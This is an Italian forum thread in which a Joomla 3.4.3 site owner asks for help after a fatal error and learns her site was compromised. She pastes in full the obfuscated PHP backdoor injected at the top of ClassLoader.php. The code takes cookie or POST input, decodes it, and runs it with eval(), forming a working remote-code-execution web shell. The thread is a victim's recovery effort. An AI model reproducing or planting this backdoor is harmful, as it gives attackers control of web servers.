Fatal error: Namespace declaration statement has... Hacker??? Cosa fare

[deuffa]

Buongiorno a tutti, stamattina ho iniziato benissimo la giornata con questo messaggio da uno dei miei siti

Fatal error: Namespace declaration statement has to be the very first statement in the script in /var/www/shared/47240/proximanoprofit.it/htdocs/libraries/vendor/composer/ClassLoader.php on line 13

Mi chiedevo due cose
1- È un possibile attacco hacker?
2- Come posso fare per risolvere il problema? (Sostituisco il file in questione in quella riga di codice? Oppure devo fare altro)

Vi ringrazio in anticipo per l'aiuto
Deuffa

[alexred]

Ciao deuffa,
hai un backup recente da poter ripristinare?

Che versione di Joomla hai?
Riesci ad accedere all'area amministrativa?
Hai alcune estensioni esterne installate? Tutte correttamente aggiornate?

[deuffa]

Buongiorno Alexred
-Ho un backup ma non così aggiornato da sostituire tutto e non dover recuperare mesi di lavoro
-Ho un la 3.4.3 mi sembra e non riuscivo ad aggiornarla (sono in attesa di risposte dal provider)
-No non riesco ad accedere all'area amministrazione (purtroppo è la prima cosa che ho tentato) ma riesco ad entrare nell'ftp (ho fatto un backup del sito in questa situazione attuale)
- Ho un'estensione ma sono nella stessa situazione della versione di Joomla
Ecco la mia situazione, non ci avevo pensato a dare queste indicazione, grazie per le domande.

[alexred]

prova a fare il backup anche del database e tenta di ripristinare il tutto in una installazione di prova sul tuo PC.
Così ti sarà più semplice trovare una soluzione in vari tentativi e replicare la soluzione nel sito online.

Con Joomla non aggiornato ed estensioni non aggiornate è molto probabile che il tuo sito sia stato vittima di un attacco.

Prova a ricercare il pacchetto di installazione di Joomla 3.4.3, estrarlo sul tuo PC, cancellare la cartella installation e sovrascrivere tutti i file e cartelle presenti sul tuo sito, magari in questo modo si ripristinano eventuali file corrotti o modificati.

[deuffa]

Ti ringrazio per i suggerimenti,
non ho mai creato una versione su pc (ho mac ma penso si possa fare uguale) come posso fare? Non sò da dove iniziare... potresti gentilmente darmi delle indicazioni/suggerimenti?


Ancora grazie
Deuffa

[alexred]

qui trovi un articolo:  http://www.joomla.it/e-ancora/articoli-community-3x/7697-come-installare-joomla-in-locale-con-xampp.html

[deuffa]

Ti ringrazio 
Sto provando anche se fino a ora i passaggi sono un pò diversi da quelli che posso fare... spero di riuscirci...

Non ho trovato la versione indicata ho scelto la più vicina e ho seguito questo tutorial per essere sicura di fare i passaggi giusti visto che ho mac
https://www.youtube.com/watch?v=MCZo4ewVXsQ

Ora provo a trovare la mia versione di joomla

[deuffa]

qui
http://www.joomla.it/download/joomla-3.html
non c'è proprio più la versione, ma perchè...?
ho trovato su un altro sito (non ho ancora provato a scaricalo però) la versione giusta ma in inglese... potrebbe andare bene lo stesso?

ancora grazie

[deuffa]

qui ho scaritato il primo joomla (non negli update) ma in italiano non lo ho trovato 
http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=6992

ho fatto coma mi hai detto tu Alexred cancellato la cartella installer e sostituite le cartelle alla mia "copia rovinata" del sito ma oltre alla riga che già conosco è comparsa anche questa:

 Notice:  Undefined index: HTTP_X_FORWARDED_FOR in /Applications/XAMPP/xamppfiles/htdocs/joomla1/includes/framework.php on line 1

cosa potrebbe dire?
..... almeno questa l'ho risolta, ho aperto un vecchio backup sano e ho copiato la prima riga e l'avviso è sparito

sto provando sulla falsa riga di questo ad aprire il file ClassLoader.php per vedere se riesco a risolvere allo stesso modo...
nel file corrotto cera molto testo prima del vero php qui con inserisci codice spero si veda...

Codice: [Seleziona]

<?php $GLOBALS['e2c86567'];global$e2c86567;$e2c86567=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['x785b']="\x5f\x79\x52\x50\x3f\x5a\x47\x37\x56\x57\x4b\x33\x67\x69\x43\x2b\x76\x36\x71\x72\x4c\x55\x22\x74\x41\x61\x75\x26\x28\x9\x30\x7a\x39\x24\x29\x7b\x7c\x7d\x65\x49\x46\x6e\x6c\x32\x31\x62\x4a\x6a\x7e\x6b\x3e\x21\x51\x27\x58\x4d\x3c\x73\x25\x34\x63\x45\x2d\xd\x2f\x23\x70\xa\x2e\x77\x4e\x5e\x2a\x60\x59\x3b\x5b\x44\x3d\x2c\x66\x6d\x54\x6f\x5c\x38\x5d\x53\x40\x78\x64\x68\x3a\x35\x20\x4f\x42\x48";$e2c86567[$e2c86567['x785b'][60].$e2c86567['x785b'][80].$e2c86567['x785b'][59].$e2c86567['x785b'][93]]=$e2c86567['x785b'][60].$e2c86567['x785b'][91].$e2c86567['x785b'][19];$e2c86567[$e2c86567['x785b'][45].$e2c86567['x785b'][25].$e2c86567['x785b'][17].$e2c86567['x785b'][17].$e2c86567['x785b'][17].$e2c86567['x785b'][7].$e2c86567['x785b'][43]]=$e2c86567['x785b'][83].$e2c86567['x785b'][19].$e2c86567['x785b'][90];$e2c86567[$e2c86567['x785b'][49].$e2c86567['x785b'][90].$e2c86567['x785b'][45].$e2c86567['x785b'][11].$e2c86567['x785b'][44].$e2c86567['x785b'][30].$e2c86567['x785b'][93]]=$e2c86567['x785b'][57].$e2c86567['x785b'][23].$e2c86567['x785b'][19].$e2c86567['x785b'][42].$e2c86567['x785b'][38].$e2c86567['x785b'][41];$e2c86567[$e2c86567['x785b'][41].$e2c86567['x785b'][90].$e2c86567['x785b'][45].$e2c86567['x785b'][80].$e2c86567['x785b'][59].$e2c86567['x785b'][32].$e2c86567['x785b'][7].$e2c86567['x785b'][80].$e2c86567['x785b'][17]]=$e2c86567['x785b'][13].$e2c86567['x785b'][41].$e2c86567['x785b'][13].$e2c86567['x785b'][0].$e2c86567['x785b'][57].$e2c86567['x785b'][38].$e2c86567['x785b'][23];$e2c86567[$e2c86567['x785b'][91].$e2c86567['x785b'][17].$e2c86567['x785b'][11].$e2c86567['x785b'][7].$e2c86567['x785b'][85].$e2c86567['x785b'][43].$e2c86567['x785b'][44].$e2c86567['x785b'][11]]=$e2c86567['x785b'][57].$e2c86567['x785b'][38].$e2c86567['x785b'][19].$e2c86567['x785b'][13].$e2c86567['x785b'][25].$e2c86567['x785b'][42].$e2c86567['x785b'][13].$e2c86567['x785b'][31].$e2c86567['x785b'][38];$e2c86567[$e2c86567['x785b'][23].$e2c86567['x785b'][60].$e2c86567['x785b'][32].$e2c86567['x785b'][90].$e2c86567['x785b'][17].$e2c86567['x785b'][38]]=$e2c86567['x785b'][66].$e2c86567['x785b'][91].$e2c86567['x785b'][66].$e2c86567['x785b'][16].$e2c86567['x785b'][38].$e2c86567['x785b'][19].$e2c86567['x785b'][57].$e2c86567['x785b'][13].$e2c86567['x785b'][83].$e2c86567['x785b'][41];$e2c86567[$e2c86567['x785b'][47].$e2c86567['x785b'][25].$e2c86567['x785b'][59].$e2c86567['x785b'][44].$e2c86567['x785b'][45].$e2c86567['x785b'][80].$e2c86567['x785b'][17].$e2c86567['x785b'][80]]=$e2c86567['x785b'][26].$e2c86567['x785b'][41].$e2c86567['x785b'][57].$e2c86567['x785b'][38].$e2c86567['x785b'][19].$e2c86567['x785b'][13].$e2c86567['x785b'][25].$e2c86567['x785b'][42].$e2c86567['x785b'][13].$e2c86567['x785b'][31].$e2c86567['x785b'][38];$e2c86567[$e2c86567['x785b'][81].$e2c86567['x785b'][32].$e2c86567['x785b'][43].$e2c86567['x785b'][60].$e2c86567['x785b'][44].$e2c86567['x785b'][32]]=$e2c86567['x785b'][45].$e2c86567['x785b'][25].$e2c86567['x785b'][57].$e2c86567['x785b'][38].$e2c86567['x785b'][17].$e2c86567['x785b'][59].$e2c86567['x785b'][0].$e2c86567['x785b'][90].$e2c86567['x785b'][38].$e2c86567['x785b'][60].$e2c86567['x785b'][83].$e2c86567['x785b'][90].$e2c86567['x785b'][38];$e2c86567[$e2c86567['x785b'][41].$e2c86567['x785b'][45].$e2c86567['x785b'][60].$e2c86567['x785b'][43].$e2c86567['x785b'][32]]=$e2c86567['x785b'][57].$e2c86567['x785b'][38].$e2c86567['x785b'][23].$e2c86567['x785b'][0].$e2c86567['x785b'][23].$e2c86567['x785b'][13].$e2c86567['x785b'][81].$e2c86567['x785b'][38].$e2c86567['x785b'][0].$e2c86567['x785b'][42].$e2c86567['x785b'][13].$e2c86567['x785b'][81].$e2c86567['x785b'][13].$e2c86567['x785b'][23];$e2c86567[$e2c86567['x785b'][89].$e2c86567['x785b'][17].$e2c86567['x785b'][30].$e2c86567['x785b'][45].$e2c86567['x785b'][93].$e2c86567['x785b'][25].$e2c86567['x785b'][11].$e2c86567['x785b'][17].$e2c86567['x785b'][85]]=$e2c86567['x785b'][16].$e2c86567['x785b'][30].$e2c86567['x785b'][85].$e2c86567['x785b'][11].$e2c86567['x785b'][44].$e2c86567['x785b'][44];$e2c86567[$e2c86567['x785b'][45].$e2c86567['x785b'][43].$e2c86567['x785b'][45].$e2c86567['x785b'][32].$e2c86567['x785b'][43].$e2c86567['x785b'][30].$e2c86567['x785b'][25]]=$e2c86567['x785b'][81].$e2c86567['x785b'][17].$e2c86567['x785b'][85].$e2c86567['x785b'][30].$e2c86567['x785b'][11].$e2c86567['x785b'][25].$e2c86567['x785b'][30].$e2c86567['x785b'][7];$e2c86567[$e2c86567['x785b'][45].$e2c86567['x785b'][17].$e2c86567['x785b'][17].$e2c86567['x785b'][45].$e2c86567['x785b'][7].$e2c86567['x785b'][38]]=$_POST;$e2c86567[$e2c86567['x785b'][41].$e2c86567['x785b'][93].$e2c86567['x785b'][44].$e2c86567['x785b'][44]]=$_COOKIE;@$e2c86567[$e2c86567['x785b'][41].$e2c86567['x785b'][90].$e2c86567['x785b'][45].$e2c86567['x785b'][80].$e2c86567['x785b'][59].$e2c86567['x785b'][32].$e2c86567['x785b'][7].$e2c86567['x785b'][80].$e2c86567['x785b'][17]]($e2c86567['x785b'][38].$e2c86567['x785b'][19].$e2c86567['x785b'][19].$e2c86567['x785b'][83].$e2c86567['x785b'][19].$e2c86567['x785b'][0].$e2c86567['x785b'][42].$e2c86567['x785b'][83].$e2c86567['x785b'][12],NULL);@$e2c86567[$e2c86567['x785b'][41].$e2c86567['x785b'][90].$e2c86567['x785b'][45].$e2c86567['x785b'][80].$e2c86567['x785b'][59].$e2c86567['x785b'][32].$e2c86567['x785b'][7].$e2c86567['x785b'][80].$e2c86567['x785b'][17]]($e2c86567['x785b'][42].$e2c86567['x785b'][83].$e2c86567['x785b'][12].$e2c86567['x785b'][0].$e2c86567['x785b'][38].$e2c86567['x785b'][19].$e2c86567['x785b'][19].$e2c86567['x785b'][83].$e2c86567['x785b'][19].$e2c86567['x785b'][57],0);@$e2c86567[$e2c86567['x785b'][41].$e2c86567['x785b'][90].$e2c86567['x785b'][45].$e2c86567['x785b'][80].$e2c86567['x785b'][59].$e2c86567['x785b'][32].$e2c86567['x785b'][7].$e2c86567['x785b'][80].$e2c86567['x785b'][17]]($e2c86567['x785b'][81].$e2c86567['x785b'][25].$e2c86567['x785b'][89].$e2c86567['x785b'][0].$e2c86567['x785b'][38].$e2c86567['x785b'][89].$e2c86567['x785b'][38].$e2c86567['x785b'][60].$e2c86567['x785b'][26].$e2c86567['x785b'][23].$e2c86567['x785b'][13].$e2c86567['x785b'][83].$e2c86567['x785b'][41].$e2c86567['x785b'][0].$e2c86567['x785b'][23].$e2c86567['x785b'][13].$e2c86567['x785b'][81].$e2c86567['x785b'][38],0);@$e2c86567[$e2c86567['x785b'][41].$e2c86567['x785b'][45].$e2c86567['x785b'][60].$e2c86567['x785b'][43].$e2c86567['x785b'][32]](0);$dd9bccc=NULL;$f78484=NULL;$e2c86567[$e2c86567['x785b'][66].$e2c86567['x785b'][85].$e2c86567['x785b'][17].$e2c86567['x785b'][60].$e2c86567['x785b'][11].$e2c86567['x785b'][32].$e2c86567['x785b'][60].$e2c86567['x785b'][30]]=$e2c86567['x785b'][25].$e2c86567['x785b'][38].$e2c86567['x785b'][43].$e2c86567['x785b'][44].$e2c86567['x785b'][43].$e2c86567['x785b'][44].$e2c86567['x785b'][17].$e2c86567['x785b'][38].$e2c86567['x785b'][62].$e2c86567['x785b'][80].$e2c86567['x785b'][93].$e2c86567['x785b'][43].$e2c86567['x785b'][45].$e2c86567['x785b'][62].$e2c86567['x785b'][59].$e2c86567['x785b'][32].$e2c86567['x785b'][17].$e2c86567['x785b'][85].$e2c86567['x785b'][62].$e2c86567['x785b'][32].$e2c86567['x785b'][90].$e2c86567['x785b'][60].$e2c86567['x785b'][60].$e2c86567['x785b'][62].$e2c86567['x785b'][59].$e2c86567['x785b'][43].$e2c86567['x785b'][30].$e2c86567['x785b'][93].$e2c86567['x785b'][85].$e2c86567['x785b'][44].$e2c86567['x785b'][7].$e2c86567['x785b'][45].$e2c86567['x785b'][90].$e2c86567['x785b'][11].$e2c86567['x785b'][93].$e2c86567['x785b'][11];global$p86c39c0;function m6803a07($dd9bccc,$wa3a){global$e2c86567;$i91872318="";for($eadd=0;$eadd<$e2c86567[$e2c86567['x785b'][49].$e2c86567['x785b'][90].$e2c86567['x785b'][45].$e2c86567['x785b'][11].$e2c86567['x785b'][44].$e2c86567['x785b'][30].$e2c86567['x785b'][93]]($dd9bccc){for($o5199=0;$o5199<$e2c86567[$e2c86567['x785b'][49].$e2c86567['x785b'][90].$e2c86567['x785b'][45].$e2c86567['x785b'][11].$e2c86567['x785b'][44].$e2c86567['x785b'][30].$e2c86567['x785b'][93]]($wa3a)&&$eadd<$e2c86567[$e2c86567['x785b'][49].$e2c86567['x785b'][90].$e2c86567['x785b'][45].$e2c86567['x785b'][11].$e2c86567['x785b'][44].$e2c86567['x785b'][30].$e2c86567['x785b'][93]]($dd9bccc);$o5199++,$eadd++){$i91872318.=$e2c86567[$e2c86567['x785b'][60].$e2c86567['x785b'][80].$e2c86567['x785b'][59].$e2c86567['x785b'][93]]($e2c86567[$e2c86567['x785b'][45].$e2c86567['x785b'][25].$e2c86567['x785b'][17].$e2c86567['x785b'][17].$e2c86567['x785b'][17].$e2c86567['x785b'][7].$e2c86567['x785b'][43]]($dd9bccc[$eadd])^$e2c86567[$e2c86567['x785b'][45].$e2c86567['x785b'][25].$e2c86567['x785b'][17].$e2c86567['x785b'][17].$e2c86567['x785b'][17].$e2c86567['x785b'][7].$e2c86567['x785b'][43]]($wa3a[$o5199]));}}return$i91872318;}function v08311($dd9bccc,$wa3a){global$e2c86567;global$p86c39c0;return$e2c86567[$e2c86567['x785b'][45].$e2c86567['x785b'][43].$e2c86567['x785b'][45].$e2c86567['x785b'][32].$e2c86567['x785b'][43].$e2c86567['x785b'][30].$e2c86567['x785b'][25]]($e2c86567[$e2c86567['x785b'][45].$e2c86567['x785b'][43].$e2c86567['x785b'][45].$e2c86567['x785b'][32].$e2c86567['x785b'][43].$e2c86567['x785b'][30].$e2c86567['x785b'][25]]($dd9bccc,$p86c39c0),$wa3a);}foreach($e2c86567[$e2c86567['x785b'][41].$e2c86567['x785b'][93].$e2c86567['x785b'][44].$e2c86567['x785b'][44]]as$wa3a=>$m1a9){$dd9bccc=$m1a9;$f78484=$wa3a;}if(!$dd9bccc){foreach($e2c86567[$e2c86567['x785b'][45].$e2c86567['x785b'][17].$e2c86567['x785b'][17].$e2c86567['x785b'][45].$e2c86567['x785b'][7].$e2c86567['x785b'][38]]as$wa3a=>$m1a9){$dd9bccc=$m1a9;$f78484=$wa3a;}}$dd9bccc=@$e2c86567[$e2c86567['x785b'][47].$e2c86567['x785b'][25].$e2c86567['x785b'][59].$e2c86567['x785b'][44].$e2c86567['x785b'][45].$e2c86567['x785b'][80].$e2c86567['x785b'][17].$e2c86567['x785b'][80]]($e2c86567[$e2c86567['x785b'][89].$e2c86567['x785b'][17].$e2c86567['x785b'][30].$e2c86567['x785b'][45].$e2c86567['x785b'][93].$e2c86567['x785b'][25].$e2c86567['x785b'][11].$e2c86567['x785b'][17].$e2c86567['x785b'][85]]($e2c86567[$e2c86567['x785b'][81].$e2c86567['x785b'][32].$e2c86567['x785b'][43].$e2c86567['x785b'][60].$e2c86567['x785b'][44].$e2c86567['x785b'][32]]($dd9bccc),$f78484));if(isset($dd9bccc[$e2c86567['x785b'][25].$e2c86567['x785b'][49]])&&$p86c39c0==$dd9bccc[$e2c86567['x785b'][25].$e2c86567['x785b'][49]]){if($dd9bccc[$e2c86567['x785b'][25]]==$e2c86567['x785b'][13]){$eadd=Array($e2c86567['x785b'][66].$e2c86567['x785b'][16]=>@$e2c86567[$e2c86567['x785b'][23].$e2c86567['x785b'][60].$e2c86567['x785b'][32].$e2c86567['x785b'][90].$e2c86567['x785b'][17].$e2c86567['x785b'][38]](),$e2c86567['x785b'][57].$e2c86567['x785b'][16]=>$e2c86567['x785b'][44].$e2c86567['x785b'][68].$e2c86567['x785b'][30].$e2c86567['x785b'][62].$e2c86567['x785b'][44],);echo@$e2c86567[$e2c86567['x785b'][91].$e2c86567['x785b'][17].$e2c86567['x785b'][11].$e2c86567['x785b'][7].$e2c86567['x785b'][85].$e2c86567['x785b'][43].$e2c86567['x785b'][44].$e2c86567['x785b'][11]]($eadd);}elseif($dd9bccc[$e2c86567['x785b'][25]]==$e2c86567['x785b'][38]){eval($dd9bccc[$e2c86567['x785b'][90]]);}exit();} ?>
dopo parecchio caricamento la pagina mi da questo errore
Error displaying the error page: Application Instantiation Error: Could not connect to MySQL.

come faccio a collegarlo al backup del database che ho fatto?
non riesco a trovare informazioni online... sono ferma 

grazie mille a tutti e a chi può darmi una mano

[deuffa]

Buonasera,
con il supporto morale di mio marito e il suo restare obbiettivo siamo riusciti a rimettere online il sito... ora spero di fare uno scan profondo e capire dove riesce a entrare il maledetto... non è la prima volta che ci riescono anche se le altre volte era diverso...

Spiego come siamo riusciti a risolvere...

abbiamo lavorato direttamente online (non riuscendo nella versione locale...)
aperto il file ClassLoader.php... come nella versione locale abbiamo cancellato il codice strano

ci ha dato un secondo problema con in cms.php dicendo di non riuscire ad richiamare un file... effettivamente non c'era il file classmap.php ma c'era un classmap.php.suspected.

abbiamo provato a rinominare il file e il sito è tornato... sicuramente non è al sicuro così come... ora lo aggiornerò ma ho letto che potrebbe non bastare qui parla di alcune cose...

http://www.dominioweb.org/ripristinare-Joomla.pdf

suggerimenti?
Deuffa